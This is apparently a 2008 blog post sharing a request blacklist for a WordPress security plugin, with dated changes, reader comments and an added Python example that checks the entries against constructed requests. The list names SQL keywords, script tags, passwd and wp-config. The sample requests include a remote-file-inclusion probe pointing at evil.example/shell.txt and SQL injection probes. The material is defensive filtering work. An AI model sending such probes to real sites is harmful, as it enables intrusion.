7/15/08 Turn off the security script while you do the update.
Your WP Security plugin only catches bad bots if you tell it who the bad bots are and which requests to block. Below is my current list of bad requests. Copy and paste it into the request blacklist after your current entries and hit the update button, and the plugin will add them to your list. Every entry is matched against incoming requests, so a short generic entry can also catch legitimate traffic; check that your own admin pages still work before you leave a new entry in place.
8/29/08
$_GET
(java|vb)
.gif?
.jpg?
.txt?
.xml?
</script>
<SCRIPT>
?page_id=http%3A%2F%2F
admin-ajax.php?
admin-function.php?
ASCII
board.php?see=ftp
CAST
com_jd-wp
CONCAT
DECLARE
DELETE
formmail
includedir=
index.php?template=
INSERT
lwp-trivial
OPTIONS
passwd
PATH=
POST /xmlrpc.php
PROPFIND
register++++
SELECT
sidebar.php?
UNION
UPDATE
word-tube-button.php?
wp-config
wp-login.php?action=http%3A%2F%2F
wp-table-button.php?
wp-trackback.php?
x-aaaaaaaaa
Notes:
I'm also checking the Emerging Threats rules downloads; it is a great site for learning a bit more about security. Open the emerging web_sql rules and scroll down to the WordPress section.
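To see what a list like the one above actually does, here is an added example (my own code, not the plugin's, and not from the original post) that runs a subset of the entries over a handful of constructed request lines. The post does not say whether the plugin treats entries as literal substrings or as regular expressions, so the example assumes case-insensitive literal substring matching and percent-decodes both the request and the entry before comparing; the sample requests, including the ajax-tag-search request reported in the comments and the wp-login.php?redirect_to entry that was removed on 7/16/08, are constructed for illustration.

```python
from urllib.parse import unquote

# Constructed subset of the request blacklist from the post.  Entries are
# treated as literal substrings (an assumption; the post does not specify).
BLACKLIST = [
    "$_GET", ".gif?", ".jpg?", "<SCRIPT>", "</script>",
    "?page_id=http%3A%2F%2F", "admin-ajax.php?", "CAST", "DECLARE",
    "SELECT", "UNION", "passwd", "PATH=", "POST /xmlrpc.php", "PROPFIND",
    "wp-config", "wp-login.php?action=http%3A%2F%2F",
]

# The entry the post removed on 7/16/08 because WP 2.6 trips it itself.
REMOVED_REDIRECT_ENTRY = "wp-login.php?redirect_to=http%3A%2F%2F"


def fully_decode(text: str) -> str:
    """Percent-decode until nothing changes: %2553ELECT -> %53ELECT -> SELECT."""
    while True:
        decoded = unquote(text)
        if decoded == text:
            return decoded
        text = decoded


def match_blacklist(request_line, blacklist=BLACKLIST, decode=True, ignore_case=True):
    """Return the blacklist entries found in a 'METHOD /path?query' request line.

    decode=True compares the percent-decoded forms of both sides, so an
    encoded keyword cannot slip past; ignore_case=True catches 'select' as
    well as 'SELECT' but also hits innocent slugs containing the word.
    """
    haystack = fully_decode(request_line) if decode else request_line
    hits = []
    for entry in blacklist:
        needle = fully_decode(entry) if decode else entry
        if ignore_case:
            found = needle.lower() in haystack.lower()
        else:
            found = needle in haystack
        if found:
            hits.append(entry)
    return hits


# Constructed request lines: real attack shapes next to legitimate traffic.
SAMPLE_REQUESTS = [
    # WordPress's own tag lookup on the post edit page (from the comments).
    "GET /wp-admin/admin-ajax.php?action=ajax-tag-search&q=origi",
    # Remote-file-inclusion probe of the kind the page_id entry targets.
    "GET /?page_id=http%3A%2F%2Fevil.example%2Fshell.txt%3F",
    # UNION-based probe, lowercased to dodge a case-sensitive match.
    "GET /index.php?id=1+union+select+1,2,3--",
    # Same probe with the keyword double-encoded.
    "GET /index.php?id=1%2Bunion%2B%2553ELECT%2B1,2,3--",
    # An ordinary post slug that happens to contain a blacklisted keyword.
    "GET /2008/08/how-to-select-a-wordpress-theme/",
    # A normal WP 2.6 login redirect; the removed entry would block this.
    "GET /wp-login.php?redirect_to=http%3A%2F%2Fexample.com%2Fwp-admin%2F",
    # WebDAV probe caught purely on the request method.
    "PROPFIND / HTTP/1.1",
]


def scan(requests=SAMPLE_REQUESTS, **options):
    """Map each request line to the entries that would block it."""
    return {req: match_blacklist(req, **options) for req in requests}


if __name__ == "__main__":
    for req, hits in scan().items():
        print("BLOCKED" if hits else "allowed", req, hits)
    print("case-sensitive:", scan(ignore_case=False))
    print("no decoding:   ", scan(decode=False))
    print("with removed entry:",
          scan(blacklist=BLACKLIST + [REMOVED_REDIRECT_ENTRY]))
```

Running it shows the trade-off directly: with case-insensitive, decoded matching the lowercased and double-encoded probes are both caught, but so are the tag search and the "how-to-select" slug; turning case sensitivity on silences both false positives and both probes at once. That is why each new entry needs a test against your own admin pages before it stays in the list.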
8/28/08
<SCRIPT>
</script>
8/11/08
CAST
DECLARE
Grumpy old man emailed to tell me that a MySQL injection attack had been tried on his site using these terms and that the security tool had not caught it. I'm adding them to my list today and suggest you do as well. See "SQL injection attack using DECLARE" or "New SQL Injection Attack Infecting Machines" for more details.
7/16/08
Removed wp-login.php?redirect_to=http%3A%2F%2F; it keeps tripping on WP 2.6.
7/9/08 All of these were part of several recent attempted but failed hacks:
com_jd-wp
index.php?template=
board.php?see=ftp
7/6/08 I added ‘PATH=’ to the list
New additions 6/18/08 (still testing these)
passwd
New addition 6/17/08
$_GET
New addition 6/15/08
register+++
New addition 6/13/08:
.gif?
.jpg?
2 responses so far
1 jmanpa // Jul 6, 2008 at 1:58 pm
I just got blocked from my own site due to this request made by the ajax tag lookup on the post edit page:
/wp-admin/admin-ajax.php?action=ajax-tag-search&q=origi
After a moment of panic, I was able to access my database and delete the rules.
You may want to tweak that.
2 ljmacphee // Jul 6, 2008 at 2:39 pm
Thanks, I took that off the list.